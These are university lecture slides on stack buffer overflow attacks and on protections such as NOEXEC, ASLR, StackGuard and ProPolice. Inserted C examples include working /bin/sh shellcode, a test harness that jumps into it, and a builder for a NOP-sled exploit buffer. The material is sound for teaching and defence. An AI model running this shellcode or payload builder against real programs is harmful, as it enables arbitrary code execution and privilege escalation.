l4p3 stack overflow

Upload: tram-tran

Post on 04-Jun-2018


TRANSCRIPT

  • 8/14/2019 L4P3 Stack Overflow

    Buffer Overflow Attack

    PHAM VAN HAU ([email protected])

    SCHOOL OF COMPUTER SCIENCE AND ENGINEERING, INTERNATIONAL UNIVERSITY

    Memory Organization (1)

    [Figure: process memory layout. Text: program code (instructions). Initialized/uninitialized data: global and static variables. Stack: local variables. The arrow beside the figure is labelled "memory address decreases".]

    Stack operation

    Stack: a stack is an abstract data type. A stack contains objects in which the last object placed on the stack is the first object removed (last in, first out, or LIFO).

    Two important operations on a stack are PUSH and POP.
    PUSH adds an element at the top of the stack.
    POP removes the element at the top of the stack.

    Assembly Example

    Function

    void fun(int a, int b, int c) {
        char buffer1[5];
        char buffer2[10];
    }

    void main() {
        fun(1,2,3);
    }

    [Figure: the stack after main calls fun(1,2,3): the frame of main, with the frame of fun pushed on top of it.]

    Procedure prolog/epilog

    Procedure prologue:
    Save the previous FP.
    Copy SP into FP to create the new FP.

    Procedure epilog: the stack must be cleaned up again.

    movl %ebp,%esp    # discard the locals: SP goes back to where FP points
    popl %ebp         # restore the caller's FP
    ret               # pop the saved IP (return address) into EIP

    Stack in function calling

    High-level languages need functions and procedures. The stack helps to implement them.

    The stack is used to dynamically allocate the local variables used in functions, to pass parameters to the functions, and to return values from the function.

    Stack in action

    For the call fun(1,2,3) from the Assembly Example:

    [Figure: the frame of fun, from the top of the stack toward increasing memory addresses: buffer2, buffer1, saved EBP, saved IP (return address), then the arguments 1, 2, 3.]

    Buffer overflow in a nutshell

    Program: vul1.c

    #include <stdio.h>
    #include <string.h>

    void main(int argc, char *argv[]) {
        char buffer[512];

        if (argc > 1) {
            strcpy(buffer, argv[1]);   /* no length check: an argv[1] longer than 512 bytes overwrites the frame */
            printf("%s", buffer);
        }
    }

    Compile: gcc -o vul1 vul1.c
    ./vul1          nothing happens
    ./vul1 hello    output=hello

    Instead of printing hello, by giving suitable input we can modify the behavior of vul1, e.g. to spawn a shell.

    Buffer overflow can redirect execution flow

    #include <stdio.h>

    void function(int a, int b, int c) {
        char buffer1[5];
        char buffer2[10];
        int *ret;

        ret = buffer1 + 12;   /* assumes buffer1 lies 12 bytes below the saved IP (i386, no stack protector) */
        (*ret) += 8;          /* skip the 8 bytes of "x = 1;" in main, so main prints 0 */
    }

    void main() {
        int x;

        x = 0;
        function(1,2,3);
        x = 1;
        printf("%d\n",x);
    }

    Demo: example{2,3}.c
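The example above depends on one compiler's exact frame layout (the 12-byte distance and the 8-byte skip), so it breaks on other platforms. The following is an added example, not code from the slides: it models the same idea, a code pointer stored right after a local buffer, as a struct so the overflow stays inside one object and runs the same everywhere. The names handle_unchecked, handle_checked, build_attack and the two target functions are assumptions made for the demonstration, and the struct member next stands in for the saved IP.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Added example (not from the slides). A buffer with a code pointer directly
 * after it, standing in for the local buffer that sits below the saved IP in
 * the slides' frame picture. The frame is modelled as a struct so that the
 * overflow stays inside one object and behaves identically on every
 * platform, instead of depending on one compiler's real frame layout. */
struct frame {
    char  buffer[16];
    int (*next)(void);   /* stands in for the saved return address */
};

static int normal_path(void)   { return 1;  }
static int hijacked_path(void) { return 42; }

/* Vulnerable handler: the copy is bounded only by the end of the frame, the
 * way strcpy() into buffer[] is bounded only by the input. Returns whatever
 * the function reached through 'next' returns after the copy. */
int handle_unchecked(const unsigned char *input, size_t len)
{
    struct frame f;
    f.next = normal_path;
    if (len > sizeof f)
        len = sizeof f;
    memcpy(&f, input, len);            /* bytes 16.. of input land on f.next */
    return f.next();
}

/* Hardened handler: the copy is bounded by the buffer and over-long input is
 * rejected (-1) rather than silently truncated. */
int handle_checked(const unsigned char *input, size_t len)
{
    struct frame f;
    f.next = normal_path;
    if (len >= sizeof f.buffer)
        return -1;
    memcpy(f.buffer, input, len);
    f.buffer[len] = '\0';
    return f.next();
}

/* Attacker input: filler up to the pointer slot, then the bytes of the
 * address of hijacked_path, exactly where 'next' lives in the frame. */
size_t build_attack(unsigned char *out, size_t cap)
{
    int (*target)(void) = hijacked_path;
    size_t pad = offsetof(struct frame, next);
    if (cap < pad + sizeof target)
        return 0;
    memset(out, 'A', pad);
    memcpy(out + pad, &target, sizeof target);
    return pad + sizeof target;
}

int demo_unchecked(void)
{
    unsigned char atk[64];
    size_t n = build_attack(atk, sizeof atk);
    return handle_unchecked(atk, n);   /* 42: control went to hijacked_path */
}

int demo_checked(void)
{
    unsigned char atk[64];
    size_t n = build_attack(atk, sizeof atk);
    return handle_checked(atk, n);     /* -1: rejected before the copy */
}

int main(void)
{
    printf("benign:    %d\n", handle_unchecked((const unsigned char *)"hello", 5));
    printf("unchecked: %d\n", demo_unchecked());
    printf("checked:   %d\n", demo_checked());
    return 0;
}
```

The attacker never calls hijacked_path; the program does, because the only bound on the copy was the input length. The hardened variant checks against the buffer size, not the frame size, and reports the rejection so the caller can fail closed instead of truncating.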

    Binary Code (1)

    Binary code, assembly code

    int g;

    void main() {
        int x;
        int y;
        int z;

        x = 1;
        y = 2;
        z = x + y;
        g = z;
    }

    Shellcode (1)

    In most cases we'll simply want the program to spawn a shell, from where we can then issue other commands as we wish.

    Place the code we are trying to execute in the buffer we are overflowing, and overwrite the return address so it points back into the buffer.

    Shellcode (2)

    [Figure: the frame after the overflow: buffer2 and buffer1 are filled with the shellcode, the saved EBP is overwritten, and the saved IP is overwritten to point back into the shellcode in the buffer; the arguments 1, 2, 3 follow above it. The arrow beside the figure is labelled "memory address decreases".]

    Code to open a shell

    In C:

    #include <stddef.h>
    #include <unistd.h>

    void main(int argc, char **argv) {
        char *name[2];

        name[0] = "/bin/sh";
        name[1] = NULL;
        execve(name[0], name, NULL);
    }

    Shellcode to open a shell

    char shellcode[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";

    Test the Shellcode

    char shellcode[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";

    void main() {
        int *ret;

        ret = (int *)&ret + 2;     /* i386 frame: ret, then the saved EBP, then the saved IP */
        (*ret) = (int)shellcode;   /* main "returns" into the shellcode */
    }

    Demo: testshellcode.c, Exploit1.c
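The slides describe placing the shellcode in the buffer and pointing the saved IP back at it, but not how the delivered buffer is laid out. The following is an added example, not code from the slides or from the Exploit*.c demos: it builds that buffer (a NOP sled, the shellcode, then the guessed address repeated in every 4-byte slot so the saved IP receives it wherever it lies) and checks the two things that silently break such a payload when it travels through strcpy(), a NUL byte in the address and a shellcode that leaves no room for an address slot. The 512-byte size and the address 0xbffff5a0 are constructed values; the shellcode bytes are the slides' own, and a 32-bit little-endian i386 target is assumed throughout.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example (not from the slides). Builds the buffer the exploit hands
 * to the vulnerable program: a NOP sled in the front half, the shellcode
 * around the middle, and the guessed address of the sled repeated in every
 * 4-byte slot after it, so the saved IP receives it wherever it lies.
 * Assumptions: a 32-bit little-endian i386 target and delivery through
 * strcpy(), which stops at the first NUL byte. */

#define NOP 0x90

/* The slides' 45-byte shellcode, used here as the sample payload. */
static const unsigned char shellcode[] =
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";
#define SHELLCODE_LEN (sizeof shellcode - 1)

/* A return address containing a NUL byte would cut the strcpy() short. */
int has_nul_byte(uint32_t addr)
{
    for (int i = 0; i < 4; i++)
        if (((addr >> (8 * i)) & 0xffu) == 0)
            return 1;
    return 0;
}

/* 1 if no NUL byte occurs in the first n bytes of p. */
int nul_free(const unsigned char *p, size_t n)
{
    return memchr(p, 0, n) == NULL;
}

/* Fill out[0..bufsize) and return bufsize, or
 *   -1 if the shellcode leaves no room for the sled and one address slot,
 *   -2 if the return address contains a NUL byte. */
int build_egg(unsigned char *out, size_t bufsize,
              const unsigned char *sc, size_t sclen, uint32_t ret)
{
    /* centre the shellcode, then round its end up so that the address
     * slots that follow stay 4-byte aligned relative to the buffer start */
    size_t end = bufsize / 2 + (sclen + 1) / 2;
    end = (end + 3) & ~(size_t)3;
    if (end < sclen || end + 4 > bufsize) return -1;
    if (has_nul_byte(ret)) return -2;
    size_t sc_off = end - sclen;

    for (size_t i = 0; i + 4 <= bufsize; i += 4) {      /* 1. addresses */
        out[i]     = (unsigned char)(ret & 0xff);
        out[i + 1] = (unsigned char)((ret >> 8) & 0xff);
        out[i + 2] = (unsigned char)((ret >> 16) & 0xff);
        out[i + 3] = (unsigned char)((ret >> 24) & 0xff);
    }
    memset(out, NOP, sc_off);                           /* 2. NOP sled */
    memcpy(out + sc_off, sc, sclen);                    /* 3. shellcode */
    return (int)bufsize;
}

unsigned char egg[512];

/* Sample run: a 512-byte buffer and a guessed stack address of 0xbffff5a0
 * (a constructed value, not one measured on any system). */
int demo_build(void)
{
    return build_egg(egg, sizeof egg, shellcode, SHELLCODE_LEN, 0xbffff5a0u);
}

int main(void)
{
    int n = demo_build();
    printf("built %d bytes, NUL-free: %d\n", n, n > 0 && nul_free(egg, (size_t)n));
    return 0;
}
```

With a 512-byte buffer the sled covers bytes 0..234, the shellcode 235..279, and every slot from 280 to the end holds the address; landing anywhere in the sled slides execution into the shellcode. The address must be guessed (or found with the offset trick from the exploit demos), and a NUL byte in it, or in the shellcode, terminates the strcpy() before the saved IP is reached, which is why both are checked before the payload is built.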

    Demo

    Exploit1
    Exploit2
    Exploit3


    Classification of buffer-overflow

    Local buffer overflow: increase privilege on the local machine

    Remote buffer overflow: gain access to a remote machine

    Kernel-Enforced Protection (PaX Project)

    Non-executable (NOEXEC): prevents the injection and execution of code into a task's address space. http://pax.grsecurity.net/docs/noexec.txt

    The first feature NOEXEC implements is the executable semantics on memory pages: making all available executable memory, including the stack, heap and all anonymous mappings, non-executable.

    Locking down of permissions on memory pages: prevent the creation of writable/executable file mappings (anonymous mappings are already made non-executable); we also refuse to turn a writable or non-executable mapping into an executable one and vice versa.
    Kernel-Enforced Protection (PaX Project)

    Address Space Layout Randomization (ASLR) http://pax.grsecurity.net/docs/aslr.txt

    Introducing randomness into the virtual memory layout for a particular process.

    Varying levels of randomness during the process of loading a binary, so that the binary mapping, dynamic library linking and stack memory regions are all randomized before the process begins executing.
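The two slides above describe what the kernel enforces; a practitioner wants to check it on a given process. The following is an added example, not from the slides or from the PaX project: on Linux it reads the permission column of /proc/self/maps for the [stack] region (rw-p is what NOEXEC promises, rwxp means injected code on the stack would run), and exposes the region's start address, which changes between two runs when ASLR is active. The sample maps lines are constructed, not captured from a real system; the Linux /proc format is assumed, and the check returns -1 elsewhere.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Added example (not from the slides). On Linux every mapping of a process
 * appears in /proc/self/maps as
 *     start-end perms offset dev inode [path]
 * The perms column ("rw-p", "r-xp", ...) is what NOEXEC is about: a stack
 * line reading rwxp means injected code on the stack would run. The start
 * column is what ASLR changes: run the program twice and compare. */

struct region {
    unsigned long start, end;
    char perms[5];
};

/* Find the mapping whose path field equals name (e.g. "[stack]") in maps
 * text holding one line per mapping. Returns 1 and fills *r, or 0. */
int find_region(const char *maps, const char *name, struct region *r)
{
    const char *line = maps;
    while (*line) {
        const char *nl = strchr(line, '\n');
        size_t len = nl ? (size_t)(nl - line) : strlen(line);
        char buf[512];
        if (len >= sizeof buf) len = sizeof buf - 1;
        memcpy(buf, line, len);
        buf[len] = '\0';

        unsigned long s = 0, e = 0;
        char perms[5] = "", path[256] = "";
        /* offset, dev and inode are skipped; the path field may be absent */
        int n = sscanf(buf, "%lx-%lx %4s %*s %*s %*s %255s", &s, &e, perms, path);
        if (n >= 3 && strcmp(path, name) == 0) {
            r->start = s;
            r->end = e;
            memcpy(r->perms, perms, sizeof r->perms);
            return 1;
        }
        if (!nl) break;
        line = nl + 1;
    }
    return 0;
}

/* 1 if the named region is mapped executable, 0 if not, -1 if not listed. */
int region_is_executable(const char *maps, const char *name)
{
    struct region r;
    if (!find_region(maps, name, &r)) return -1;
    return r.perms[2] == 'x';
}

/* Start address of the named region (0 if absent); differs between runs
 * when ASLR is active. */
unsigned long region_start(const char *maps, const char *name)
{
    struct region r;
    return find_region(maps, name, &r) ? r.start : 0;
}

/* Live check of this process; Linux only, -1 elsewhere. */
int stack_is_executable(void)
{
    FILE *fp = fopen("/proc/self/maps", "r");
    if (!fp) return -1;
    char *text = calloc(1, 1 << 16);
    if (!text) { fclose(fp); return -1; }
    size_t got = fread(text, 1, (1 << 16) - 1, fp);
    (void)got;                      /* text is NUL-terminated by calloc */
    fclose(fp);
    int rc = region_is_executable(text, "[stack]");
    free(text);
    return rc;
}

/* Constructed sample lines (not captured from a real system). */
const char sample_noexec[] =
    "08048000-08049000 r-xp 00000000 08:01 1234       /tmp/vul1\n"
    "bffdf000-c0000000 rw-p 00000000 00:00 0          [stack]\n";
const char sample_execstack[] =
    "08048000-08049000 r-xp 00000000 08:01 1234       /tmp/vul1\n"
    "bffdf000-c0000000 rwxp 00000000 00:00 0          [stack]\n";

int main(void)
{
    printf("sample stack executable: %d / %d\n",
           region_is_executable(sample_noexec, "[stack]"),
           region_is_executable(sample_execstack, "[stack]"));
    printf("this process: %d, stack starts at %#lx\n", stack_is_executable(),
           0UL);
    return 0;
}
```

Running the binary twice and comparing the [stack] start address is the quickest way to see whether ASLR is on for it; a stack that reports rwxp (for example a binary linked with an executable-stack note) is exactly the case the slides' shellcode relies on.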
    StackGuard

    StackGuard adds code at the RTL level to the function_prologue and function_epilogue functions within GCC to provide the generation and validation of the stack canary.
    A random canary is placed directly before the return address.
    If the canary changes, it means that there was stack smashing.

    Defeating StackGuard

    Possibility of bypassing StackGuard by overwriting local variables that could then be used to compromise the protection. Overwriting function pointers and frame pointers stored on the stack can also lead to compromise. Protection against non-stack-based attack vectors such as heap overflows is also beyond the scope of StackGuard.
    (A Comparison of Buffer Overflow Prevention Implementations and Weaknesses)

    ProPolice Stack-Smashing Protection (SSP)

    SSP proactively monitors stack changes. SSP's approach re-arranges argument locations, return addresses, previous frame pointers and local variables. SSP has come up with the following safe stack model.

    Defeating ProPolice SSP

    ProPolice is better protection against stack overflows than the other compiler patches, but it still has problems.
    (A Comparison of Buffer Overflow Prevention Implementations and Weaknesses)
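The two slides above make one concrete claim: a canary before the return address catches a long overflow, but a local pointer lying between the buffer and the canary can be overwritten without tripping it, and ProPolice answers this by moving pointer locals below buffers. The following is an added example, not from the slides or from either project: it models both frame orders as structs (guard_frame for the StackGuard order, ssp_frame for the ProPolice order), applies the same overflow to each, and reports whether the canary check fires or the pointer was silently corrupted. The canary value, frame members and attack bytes are constructed for the demonstration; a real epilogue only checks the canary, and the extra pointer comparison is there to make the silent corruption visible.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example (not from the slides). Two simulated frame layouts, each a
 * struct so that the overflow is confined to one object and runs the same on
 * any platform. The copy into buf is bounded only by the end of the frame,
 * like strcpy() into a fixed-size local buffer.
 *
 *   guard_frame: StackGuard order. A pointer local lies between the buffer
 *                and the canary, so it can be corrupted without touching
 *                the canary, which is the bypass the slides describe.
 *   ssp_frame:   ProPolice order. Pointer locals are moved below buffers,
 *                so an overflow out of buf reaches the canary first. */

#define CANARY 0x2f7a1b93u   /* stands in for the per-process random value */

struct guard_frame {
    char      buf[16];
    void     *ptr;           /* e.g. a function pointer local */
    uint32_t  canary;
    uintptr_t saved_ip;
};

struct ssp_frame {
    void     *ptr;           /* reordered below the buffer by SSP */
    char      buf[16];
    uint32_t  canary;
    uintptr_t saved_ip;
};

enum outcome { CLEAN = 0, CANARY_TRIPPED = 1, PTR_CORRUPTED = 2 };

/* Copy len bytes into the frame starting at buf, bounded by the frame end,
 * then run the epilogue's canary check and, for the demo only, compare the
 * pointer local against its legitimate value (a real epilogue never does). */
int run_guard(const unsigned char *in, size_t len)
{
    struct guard_frame f;
    void *legit = &f;
    size_t off = offsetof(struct guard_frame, buf);
    memset(&f, 0, sizeof f);
    f.ptr = legit; f.canary = CANARY; f.saved_ip = 0xdeadbeefu;
    if (len > sizeof f - off) len = sizeof f - off;
    memcpy((unsigned char *)&f + off, in, len);        /* the overflow */
    if (f.canary != CANARY) return CANARY_TRIPPED;
    if (f.ptr != legit) return PTR_CORRUPTED;
    return CLEAN;
}

int run_ssp(const unsigned char *in, size_t len)
{
    struct ssp_frame f;
    void *legit = &f;
    size_t off = offsetof(struct ssp_frame, buf);
    memset(&f, 0, sizeof f);
    f.ptr = legit; f.canary = CANARY; f.saved_ip = 0xdeadbeefu;
    if (len > sizeof f - off) len = sizeof f - off;
    memcpy((unsigned char *)&f + off, in, len);        /* the overflow */
    if (f.canary != CANARY) return CANARY_TRIPPED;
    if (f.ptr != legit) return PTR_CORRUPTED;
    return CLEAN;
}

/* Attack input (constructed): 16 filler bytes, then one pointer-sized word
 * of 'A's that lands on whatever follows buf in the frame. */
static unsigned char attack[16 + sizeof(void *)];
static size_t attack_len(void)
{
    memset(attack, 'A', sizeof attack);
    return sizeof attack;
}

int demo_guard_attack(void) { return run_guard(attack, attack_len()); }  /* 2 */
int demo_ssp_attack(void)   { return run_ssp(attack, attack_len()); }    /* 1 */
int demo_benign(void)
{
    return run_guard((const unsigned char *)"hi", 2)
         | run_ssp((const unsigned char *)"hi", 2);                      /* 0 */
}
/* A longer overflow reaches the canary even in StackGuard order. */
int demo_guard_long(void)
{
    unsigned char big[40];
    memset(big, 'A', sizeof big);
    return run_guard(big, sizeof big);                                   /* 1 */
}

int main(void)
{
    printf("StackGuard order, 24-byte overflow: %d\n", demo_guard_attack());
    printf("ProPolice order,  24-byte overflow: %d\n", demo_ssp_attack());
    printf("StackGuard order, 40-byte overflow: %d\n", demo_guard_long());
    return 0;
}
```

The same 24-byte input corrupts the pointer without touching the canary in the StackGuard order and trips the canary in the ProPolice order; only the 40-byte input, which must cross the canary to reach the saved IP, is caught in both. That is the whole of the "overwriting local variables" bypass and of SSP's reordering answer to it; neither layout says anything about heap overflows, which is the other limit the StackGuard slide names.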

    StackShield

    On function entry the return address is copied to the Global Ret Stack; on function return the return address is copied from the Global Ret Stack back to the application's stack, overwriting any possible compromise.

    Defeating StackShield

    Methods for defeating StackShield are similar to those used to bypass StackGuard protection.

    Windows 2003 Stack Protection

    Microsoft implemented a compiler-based protection solution to ensure that their products were secure out of the box. Microsoft's solution is very similar to Crispin Cowan's StackGuard covered earlier in this paper.

    NGSEC StackDefender 1.10 works at the kernel level.

    http://www.cvedetails.com/product/22318/Microsoft-Windows-8.html?vendor_id=26